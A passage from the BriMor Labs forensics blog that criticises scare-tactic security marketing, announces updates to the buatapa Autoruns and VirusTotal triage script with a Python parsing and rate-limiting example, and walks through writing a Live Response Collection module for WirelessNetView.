<span style="font-size: large;">Now, we can argue the merits of uploading samples to VirusTotal versus doing analysis on them internally first. In this case, I personally happen to support the former, because there is no need for the internal CIRT to respond to an email that contained an attachment which solely installs a toolbar for "Decent Looking Mail Order Brides", so the VirusTotal results determine the internal escalation of the email. If an actual advanced threat group is trying to infiltrate an organization and a piece of their malware is uploaded to VirusTotal where the whole world can see it, so what? It means that they have been discovered and will probably have to come up with something new in an effort to achieve their goal of infiltrating their target. VirusTotal is simply a tool that we can use; it is not the end-all, be-all solution (see <a href="https://en.wikipedia.org/wiki/Polymorphic_code" target="_blank">malware, polymorphic</a>).</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">There are a limited number of individuals and companies that work in our profession, but that number is growing every single day. Unfortunately this growth also brings with it individuals who misrepresent their capabilities and understanding of pertinent information, but are more than happy to sell you products and services that usually come with very expensive price tags. In this particular case, it looks like Mountebank Labs is loading domains into VirusTotal and, when a hit comes back, shooting off an email to the CISO or CIO of the company and "alerting" them. While there is nothing "wrong" with that aspect of it (although frankly, I don't know how you can have the time or resources to do that, as everyone that I know has plenty of work with their own clients and does not need to put out a blanket domain search in VirusTotal in an effort to drum up work), in my opinion it is not the right thing to do. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I do perform monitoring from several data sources for my clients, and in the event of discovering data from another company, I will inform them who I am, who I work for, exactly what I was doing, how I found their data, where they can go to find that data, and how to contact me, and leave it at that. I strive to be 100% transparent because the last thing that I want to have happen is for a company to think that I was the source of their data being compromised. If they want to have additional conversations that is entirely up to them and I tell them so. I want to help people protect their networks and sensitive data, regardless of whether or not they hire me to help them. If you receive an email like this, the author of the email (who will usually NOT be a CEO or a member of the sales team; it will likely be a technical employee or a manager) should answer several questions in the original message, without you or your CIRT having to search for the answers:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<ul>
<li><span style="font-size: large;">Who exactly are you?</span></li>
<li><span style="font-size: large;">What company do you currently work for?</span></li>
<li><span style="font-size: large;">What were you doing when you found this information?</span></li>
<li><span style="font-size: large;">Where did you find this information?</span></li>
<li><span style="font-size: large;">When did you find this information?</span></li>
<li><span style="font-size: large;">What is your contact information? (Not in a signature block; you should clearly list your contact information.)</span></li>
</ul>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If these questions are not answered with very specific details, it is more than likely just another marketing email, trying to get you to spend your money on their services. Granted, this may not always be the case, but usually it will be. When in doubt, you can always get a second opinion, which is exactly what Kelvarnsen Industries did when they contacted me regarding this issue.</span><br />
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">This case also highlights another area of importance that I cannot stress enough. It is bad enough that CIRT/Net Defenders/etc. teams are tasked on a daily basis with detecting and thwarting attacks by adversaries. When a company's C-Suite executives receive an email like this, the teams must stop everything that they are doing in order to manage their executives' concern and ultimately determine whether an email such as this is an actual phish or is nothing more than a vaguely worded and misconstrued marketing attempt (ahem...scare tactics). <u><b>This also shows that unknowledgeable individuals are targeting companies, in publicly available data sources, in an effort to find out more about them in an attempt to secure a business deal. Pretty ironic that these folks are doing the EXACT same thing that adversary groups are doing: attempting to gather information for their own financial or informational gain. The irony of that is not lost on anyone! The unfortunate truth about marketing emails like this is that, just like phishing, they must work occasionally or else these unknowledgeable individuals would not send them.</b></u> These teams also have enough to do on a daily basis (plus after-hours and weekends, as was the case here) without having to deal with the Marketing Persistent Threat. Blatant marketing attempts such as the one detailed in this post hurt <u>MUCH</u> more than they could ever possibly help!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moran<br />
<br />
<span style="font-size: large;"><b><u>Updates (and a new feature!) to buatapa</u></b></span><br />
<span style="font-size: small;"><i>Posted November 12, 2015 (updated January 30, 2018)</i></span><br />
<span style="font-size: large;">Hello again readers and welcome back! Today we are pleased to announce the release of a new version of <a href="http://www.brimorlabsblog.com/2015/08/publicly-announcing-buatapa.html">buatapa</a>, updating from version 0.0.5 to 0.0.6. The changes are going to be mostly transparent for end users, but it does account for a change in the output of autoruns.csv files generated with the recently released <a href="https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx">Autoruns 13.5</a>, which has an additional field in the output. The new version of buatapa attempts to identify whether the autoruns.csv file was generated by Autoruns 13.5 or by Autoruns 13.4 (or earlier). The parsing of the data and the need for a VirusTotal API key to perform the VirusTotal lookups are exactly the same.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">And as a super awesome bonus feature, it also performs queries of <a href="http://threatcrowd.org/">ThreatCrowd</a> and returns data if any is found. In order not to have to write an additional timer (the ThreatCrowd API is limited to one query every 10 seconds) I included the ThreatCrowd lookup with the VirusTotal lookup, so for the purposes of buatapa you are required to have a VirusTotal API key in order to perform the ThreatCrowd lookups. You can modify the script to not require that if you wish, but if you do, be sure to allow for a 10-second sleep between each query. </span><br />
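<span style="font-size: large;">The two changes above, detecting which Autoruns layout wrote the CSV and spacing the lookups out for the API limits, are the parts of a script like this that tend to break quietly, so here is an added example of both. It is not buatapa's own code. The autoruns.csv content is constructed, the hashes are placeholders, and the "lookups" are stand-ins that return canned results rather than calling VirusTotal or ThreatCrowd. It assumes that the field Autoruns 13.5 added is a leading "Time" column; because rows are keyed by column name rather than position, a differently named extra column would still leave the hash fields intact, which is the point of the approach.</span><br />

```python
import codecs
import csv
import io
import time
from typing import Callable, Dict, List, Optional

# Constructed autoruns.csv content (not real exports).  NEW_LAYOUT adds a leading
# "Time" column, ASSUMED here to be the field Autoruns 13.5 introduced.  Hashes are placeholders.
_HEADER = ["Entry Location", "Entry", "Enabled", "Category", "Profile", "Description",
           "Signer", "Company", "Image Path", "Version", "Launch String", "MD5",
           "SHA-1", "PESHA-1", "PESHA-256", "SHA-256", "IMP"]
_ROWS = [
    ["HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Updater", "enabled", "Logon",
     "System-wide", "", "", "", "c:\\users\\public\\updater.exe", "",
     "c:\\users\\public\\updater.exe", "00112233445566778899aabbccddeeff", "", "", "", "", ""],
    ["HKLM\\System\\CurrentControlSet\\Services", "svchelper", "enabled", "Services",
     "System-wide", "", "", "", "c:\\windows\\temp\\svchelper.exe", "",
     "c:\\windows\\temp\\svchelper.exe", "ffeeddccbbaa99887766554433221100", "", "", "", "", ""],
    # same binary autostarted from a second location: must not be looked up twice
    ["HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Updater", "enabled", "Logon",
     "user", "", "", "", "c:\\users\\public\\updater.exe", "",
     "c:\\users\\public\\updater.exe", "00112233445566778899aabbccddeeff", "", "", "", "", ""],
]


def _to_csv(header: List[str], rows: List[List[str]]) -> str:
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    writer.writerows(rows)
    return buf.getvalue()


OLD_LAYOUT = _to_csv(_HEADER, _ROWS)                                                # 13.4 style
NEW_LAYOUT = _to_csv(["Time"] + _HEADER, [["20151112-162900"] + r for r in _ROWS])  # 13.5 style


def decode_export(raw: bytes) -> str:
    """Exports may be UTF-16 (with a BOM) or UTF-8 depending on how they were produced."""
    if raw.startswith(codecs.BOM_UTF16_LE) or raw.startswith(codecs.BOM_UTF16_BE):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


def detect_layout(fieldnames: List[str]) -> str:
    return "13.5 or later" if "Time" in fieldnames else "13.4 or earlier"


def parse_autoruns(text: str):
    """Key every row by column name, so an inserted column cannot shift the hash fields."""
    reader = csv.DictReader(io.StringIO(text, newline=""))
    rows = list(reader)
    return detect_layout(reader.fieldnames or []), rows


def entries_to_check(rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Collect enabled entries that carry an MD5, one per distinct hash."""
    seen: Dict[str, Dict[str, str]] = {}
    for row in rows:
        md5 = (row.get("MD5") or "").strip().lower()
        if len(md5) == 32 and row.get("Enabled", "").lower() == "enabled" and md5 not in seen:
            seen[md5] = {"md5": md5, "entry": row.get("Entry", ""),
                         "image": row.get("Image Path", ""), "time": row.get("Time", "")}
    return list(seen.values())


class RateLimiter:
    """Enforce a minimum spacing between calls; clock/sleep are injectable so tests need not wait."""
    def __init__(self, min_interval: float, clock=time.monotonic, sleep=time.sleep):
        self.min_interval, self._clock, self._sleep = min_interval, clock, sleep
        self._last: Optional[float] = None
        self.total_slept = 0.0

    def wait(self) -> None:
        if self._last is not None:
            remaining = self.min_interval - (self._clock() - self._last)
            if remaining > 0:
                self._sleep(remaining)
                self.total_slept += remaining
        self._last = self._clock()


def lookup_all(entries, vt_lookup: Callable, tc_lookup: Callable, limiter: RateLimiter):
    """One wait() per hash covers both services, the way buatapa rides ThreatCrowd on the VirusTotal timer."""
    results = []
    for entry in entries:
        limiter.wait()
        results.append({**entry, "virustotal": vt_lookup(entry["md5"]),
                        "threatcrowd": tc_lookup(entry["md5"])})
    return results


# Stand-ins for the real API calls: canned results for one known-bad hash, None otherwise.
_FAKE_INTEL = {"00112233445566778899aabbccddeeff": {
    "vt": {"positives": 43, "total": 57},
    "tc": {"domains": ["update.example.invalid"], "ips": ["203.0.113.7"]}}}


def fake_vt_lookup(md5: str):
    return _FAKE_INTEL.get(md5, {}).get("vt")


def fake_tc_lookup(md5: str):
    return _FAKE_INTEL.get(md5, {}).get("tc")


class FakeClock:
    """Virtual clock: sleep() advances time instead of blocking."""
    def __init__(self):
        self.t = 0.0

    def now(self) -> float:
        return self.t

    def sleep(self, seconds: float) -> None:
        self.t += seconds


if __name__ == "__main__":
    layout, rows = parse_autoruns(decode_export(NEW_LAYOUT.encode("utf-16")))
    clock = FakeClock()
    limiter = RateLimiter(10.0, clock=clock.now, sleep=clock.sleep)
    for r in lookup_all(entries_to_check(rows), fake_vt_lookup, fake_tc_lookup, limiter):
        print(layout, r["md5"], r["virustotal"], r["threatcrowd"])
    print("seconds spent rate limiting:", limiter.total_slept)
```

<span style="font-size: large;">Swap the two fake lookups for real API calls and pass the default clock and sleep to RateLimiter to use this for real. A 10-second interval satisfies the ThreatCrowd limit quoted above; the public VirusTotal API allows four requests per minute, so if you split the two services onto separate timers, the VirusTotal one needs 15 seconds.</span><br />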
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4DWj-tR3QCK-bIb4fUQGaeZGW9gLTw7kadwIhwaXzYazRtaihMFj2vXqEOW_MF1KkO_yZBBLGLv-Bdq29D_knmfUprV0gWXphW0pMu0IJ6zaBWOl_NZz6ouAbTbGREPIU6IzKn42O0TuW/s1600/new-buatapa.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4DWj-tR3QCK-bIb4fUQGaeZGW9gLTw7kadwIhwaXzYazRtaihMFj2vXqEOW_MF1KkO_yZBBLGLv-Bdq29D_knmfUprV0gWXphW0pMu0IJ6zaBWOl_NZz6ouAbTbGREPIU6IzKn42O0TuW/s640/new-buatapa.jpg" width="608" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Output results of buatapa 0.0.6</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">In this particular instance, we have two URLs. One is for the <a href="https://www.virustotal.com/en/file/9dcbb64f365fdf6f80607d297d88134efa4a74ebadc3cc3c5effa9c4f8625937/analysis/1439870354/">VirusTotal results</a> for the hash:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4NXcxbCY6rmcB5GblypWt9TjmIFwuljR7wDTR0xeTNKJsu4aHimn5l0nyv5-Rj0BU1AbTnNK5-_oG2LHThvkX5Yzb1QsHRBBI0HE-a5mb83gEdjg6ago8jnBV5m2cMrq7WqNYqoRpYKD9/s1600/vt-results.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="528" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4NXcxbCY6rmcB5GblypWt9TjmIFwuljR7wDTR0xeTNKJsu4aHimn5l0nyv5-Rj0BU1AbTnNK5-_oG2LHThvkX5Yzb1QsHRBBI0HE-a5mb83gEdjg6ago8jnBV5m2cMrq7WqNYqoRpYKD9/s640/vt-results.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">VirusTotal results for the ZeroAccess malware sample</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">and the other is for the </span><a href="https://www.threatcrowd.org/malware.php?md5=8df1f6f7cf864df50f02cbab508564b0" style="font-size: x-large;">ThreatCrowd results</a><span style="font-size: large;"> for the hash:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMrS06Dda76NFkkv8-N000eR8Ra1OppcBS2iyBpLENFABZfdk09otNsm3lrVfciWW6V_9o-c1sSQkAlHFkJB-W-RaRNI8z9APzx1x4yNKQicHycXkekG-PzVQry9Qmyrjwy83JjId3ciSQ/s1600/tc-results.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMrS06Dda76NFkkv8-N000eR8Ra1OppcBS2iyBpLENFABZfdk09otNsm3lrVfciWW6V_9o-c1sSQkAlHFkJB-W-RaRNI8z9APzx1x4yNKQicHycXkekG-PzVQry9Qmyrjwy83JjId3ciSQ/s640/tc-results.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">ThreatCrowd results for the ZeroAccess malware sample</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If the sample has been noted on ThreatCrowd you can go through the information listed to look for additional indicators associated with the malware, including domains and IP addresses, in an effort to help detect other instances of the malware within your environment. Plus, the pictures are really nice!!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;">buatapa_0_0_7.zip - <a href="https://www.brimorlabs.com/Tools/Scripts/Python/buatapa_0_0_7.zip" target="_blank">download here</a> </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">MD5: 8c2f9dc33094b3c5635bd0d61dbeb979</span><br />
<span style="font-size: large;">SHA-256: c1f67387484d7187a8c40171d0c819d4c520cb8c4f7173fc1bba304400846162</span><br />
<span style="font-size: large;">Version 0.0.7</span><br />
<span style="font-size: large;">Updated: January 30, 2018</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moran<br />
<br />
<span style="font-size: large;"><b><u>Putting a wrap on October</u></b></span><br />
<span style="font-size: small;"><i>Posted October 30, 2015</i></span><br />
<span style="font-size: large;">Hello again readers and welcome back! For us, October consisted of a lot of traveling giving presentations about the Live Response Collection at <a href="http://www.bsidesraleigh.ninja/" target="_blank">BSides Raleigh</a>, <a href="http://www.aacc.edu/cybercenter/" target="_blank">Anne Arundel Community College</a>, <a href="http://womenetc.org/">WomenEtc.</a> (Richmond, Virginia), and the <a href="http://www.osdfcon.org/" target="_blank">Open Source Digital Forensics Conference (OSDFCON)</a>. I just posted the presentation that I gave at <a href="http://www.slideshare.net/BriMorLabs/brimor-labs-live-response-collection-osdfcon" target="_blank">OSDFCon on slideshare</a>, if you would like to view the slides!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">NOTE: I made some slight variations on the presentation at each venue, so if you attended one (or more!) of my talks you will notice that the slides are similar, but may not be exactly what you saw. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">All of the events that I spoke at were great, but I was most impressed with OSDFCon this year. There was an incredible lineup of speakers at the event, and the venue and presentations were fantastic (and thanks again to Ali for all of her hard work, mainly behind the scenes, to ensure the event went smoothly!). There were quite a few students and other new entrants into the DFIR community at this year's event, which is always great to see. Hopefully that trend continues, as there is not a single person within the DFIR community who has gotten to where they are today without the help, collaboration, and communication of others!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Not to give away any spoilers, but I am working on some exciting updates for the Live Response Collection, primarily on the OSX side, that I hope to have out before the end of the year. I am always looking for anyone who can devote any time or resources for beta testing, so if you want to help please do not hesitate to reach out!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moran<br />
<br />
<span style="font-size: large;"><b><u>Introducing Windows Live Response Collection modules...and how to write your own!</u></b></span><br />
<span style="font-size: small;"><i>Posted September 21, 2015 (updated October 17, 2019)</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hello again readers and welcome back. Today I am very happy to announce the public release of the latest round of updates to the Live Response Collection. This release focuses on the "modules" that I <a href="http://www.brimorlabsblog.com/2015/08/at-long-last-updates-to-live-response.html" target="_blank">touched briefly on in the last update</a>. The size of the six main scripts themselves has been greatly reduced and almost all of the code now resides in the folder "Scripts\Windows-Modules". This makes maintaining the code easier (since all six scripts share a large majority of the code, it only has to be edited once instead of six times) and allows even greater customization opportunities for end users. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">There are some small changes to the way the LRC handles data, including a built-in check to ensure the date stamp does not contain unexpected characters, which were seen on some UK-based systems. The script now attempts to decipher that date properly but, in the event that it cannot, it tries to ensure that slashes are removed from the date field, so that the output of the tools and system calls is stored properly (a slash in a folder name built from the date would otherwise be treated as a path separator). </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b><u>Writing your own module!!</u></b></span></div>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The main focus of this update is demonstrating how easy it is to create your own module. I attempted to make this process as easy as possible, so if you want to write or add modules, you can do so very easily. Since it is written in batch, you can write your own module however you would like, but following this methodology should give the best results and ensure that the script errors out rather than possibly presenting bad data to you.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The first thing you have to do is choose an executable (or system call) that you would like to add. In this particular case, I decided that the <a href="http://www.nirsoft.net/utils/wireless_network_view.html">WirelessNetView executable from NirSoft</a> would be a good choice for the walk-through. Start by <a href="http://www.nirsoft.net/utils/wirelessnetview.zip">downloading the zip file</a> from their website, then navigate to it and unzip it. You should then see a folder like this. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6D3k5jll9bHxVixror6171FNBwgbWoBZR2oEa4gFCjrd-YMpmpCeYIUNPdCEAXDz524Z634RniE6yBCFbHdMhSB8KOb5QF8xfbdYNLh4gNz5_jN9Qo7SRJ-FdWWVun3GZQWPMJJGbVTsv/s1600/wirelessnetview.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6D3k5jll9bHxVixror6171FNBwgbWoBZR2oEa4gFCjrd-YMpmpCeYIUNPdCEAXDz524Z634RniE6yBCFbHdMhSB8KOb5QF8xfbdYNLh4gNz5_jN9Qo7SRJ-FdWWVun3GZQWPMJJGbVTsv/s640/wirelessnetview.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Contents of the folder "wirelessnetview"</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Copy that folder to the "Tools" directory under the Windows Live Response folder. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0G5ZIcBM9zNi4JU-RCR10IhWDUqFywUcIrBB0p6AHztfI1SY_aWfTVZ4Gg7wUdy5nDQ4OMkIWzQWM_x3aUQ8aUUId46cuS8mvrjqPT6rFrPy7gdkaveew_MrvD7qZ7pZrC0KQ3yNla3JM/s1600/wnv_in_tools.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0G5ZIcBM9zNi4JU-RCR10IhWDUqFywUcIrBB0p6AHztfI1SY_aWfTVZ4Gg7wUdy5nDQ4OMkIWzQWM_x3aUQ8aUUId46cuS8mvrjqPT6rFrPy7gdkaveew_MrvD7qZ7pZrC0KQ3yNla3JM/s640/wnv_in_tools.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>wirelessnetview folder under "Tools"</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Once that is done, you are ready to begin writing your module!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b><u>Initial Steps of Module Creation</u></b></span></div>
<div style="text-align: center;">
<span style="font-size: large;"><br /></span></div>
<span style="font-size: large;">This version of the Live Response Collection contains a file in the "Windows-Modules" folder called "Windows-Module-Template.bat". Open that file in your favorite text editing program.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-m9VObK3bd4kcL2H98k7PEpa3aC2rb1JRb-mQfK6X65lICEN79eQQcYUDRRvwJKyMyZiIwvaENHIaaJ1qqcxl-0F0ZjkTGmPKiTMlRTPq-hFb499456saX0KAG9GmW9I1Oo-PsFhxgZIm/s1600/window-module-template.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-m9VObK3bd4kcL2H98k7PEpa3aC2rb1JRb-mQfK6X65lICEN79eQQcYUDRRvwJKyMyZiIwvaENHIaaJ1qqcxl-0F0ZjkTGmPKiTMlRTPq-hFb499456saX0KAG9GmW9I1Oo-PsFhxgZIm/s640/window-module-template.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Contents of Windows-Module-Template.bat</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Once you have it open, save it as the tool name that you would like to run. In this case, I would open the file </span><span style="font-size: large;">"Windows-Module-Template.bat"</span><span style="font-size: large;"> and save it as "wirelessnetview.bat". </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0UQRJSq42pjf0LDmSAHyKEc8iH1YP6_lfKvCEn9lsUOibJkUBylJFk2jCBU0ZKK3l1T5-I58VZejRKGUn8eBE-SLKzRR9d6wZukWSZ9qyMHCbnOwmGkom_Sy9E5iPfSgV2BD9Z7FSjd0m/s1600/wirelssnetview-saving.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0UQRJSq42pjf0LDmSAHyKEc8iH1YP6_lfKvCEn9lsUOibJkUBylJFk2jCBU0ZKK3l1T5-I58VZejRKGUn8eBE-SLKzRR9d6wZukWSZ9qyMHCbnOwmGkom_Sy9E5iPfSgV2BD9Z7FSjd0m/s640/wirelssnetview-saving.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Saving the template as our new module</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now you can begin to edit the "wirelessnetview.bat" module and add more functionality to the LRC! </span><br />
<span style="font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-size: large;"><u><b>Writing the module</b></u></span></div>
<br />
<br />
<div style="text-align: center;">
<span style="font-size: large;"><br /></span></div>
<span style="font-size: large;">I tried to make it as easy as possible to do substitutions within the template, so really the only things you will have to do are:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">1) Have an understanding of what command line arguments you need to give your executable file (or system command), and </span><br />
<span style="font-size: large;">2) Be able to find and replace text within your new batch script</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">You should not have to change any of the environment and script variables, so I will not cover them in great detail, unless a specific request is made to do so. Here is a full listing of the items that you should replace (Ctrl + H in most cases). One caveat: replace YYYYMMDD before DD and YYYY, because those two shorter strings also occur inside it and a find-and-replace done in the wrong order will mangle the date:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">YYYYMMDD - Four digit year, two digit month, and two digit day (19970829, 20150915)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">DD - Date you wrote the module, with two digits (03, 11, 24, 31)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Month - Month you wrote the module (July, March, December)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">YYYY - Year you wrote the module (2015, 2016, 4545)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Your Name] - Your name, if you want to put it in there (Brian Moran, Leeroy Jenkins)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[you@emailaddress] - Your email address, if you want to put it in there (tony@starkindustries.com, info@mrrobot.com)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Twitter name] - Your Twitter name, if you want to put it in there (Captain America, Star Wars)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[@Twitterhandle] - </span><span style="font-size: large;">Your Twitter handle, if you want to put it in there (@captainamerica, @starwars</span><span style="font-size: large;">)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[MODULENAME] - What you want to call your module. I prefer to use the tool name, so in this case WIRELESSNETVIEW</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Tool path] - This is the path, within the tools folder, of the folder name and the exe. In this case, it would be wirelessnetview\WirelessNetView.exe</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[command line arguments] - This is where you have to do some testing of running your tool from the command line before you create the module. In this particular case, I am going to use what is listed on the web page as the command I want to run. The full command is </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>WirelessNetView.exe /shtml "f:\temp\wireless.html"</i>, so our [command line arguments] in this case would be </span><span style="font-size: large;">/shtml</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Output folder] - The folder that you want to output the data to. Since this is network related, saving it under "</span><span style="font-size: large;">NetworkInfo" seems like a good idea.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Output file name and file extension] - The filename that you want to save the file as. Generally I make this the name of the tool, so I would call this one "Wirelessnetview.html".</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Tool name] - The name of the tool. (Wirelessnetview)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Executable name] - The name of the executable (WirelessNetView.exe)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Executable download location, if applicable] - The URL where you downloaded the tool from (in this case, http://www.nirsoft.net/utils/wireless_network_view.html)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">And that is it!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>**Please note that there are two ways to save a module's output: the batch script can redirect the command's output to the output file itself, or the executable/command can write its own output file (as WirelessNetView does with /shtml). Check the executable's or system command's documentation to determine "how" its output should be saved before you fill in the template.**</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">So when we modify the wirelessnetview.bat file, we replace the following items with their value:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">YYYYMMDD - is replaced with 20150917</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">DD - is replaced with 17</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Month - is replaced with September</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">YYYY - is replaced with 2015</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Your Name] - is replaced with Brian Moran</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[you@emailaddress] - is replaced with brian@brimorlabs.com</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Twitter name] - is replaced with BriMor Labs</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[@Twitterhandle] - is replaced with @BriMorLabs</span><br />
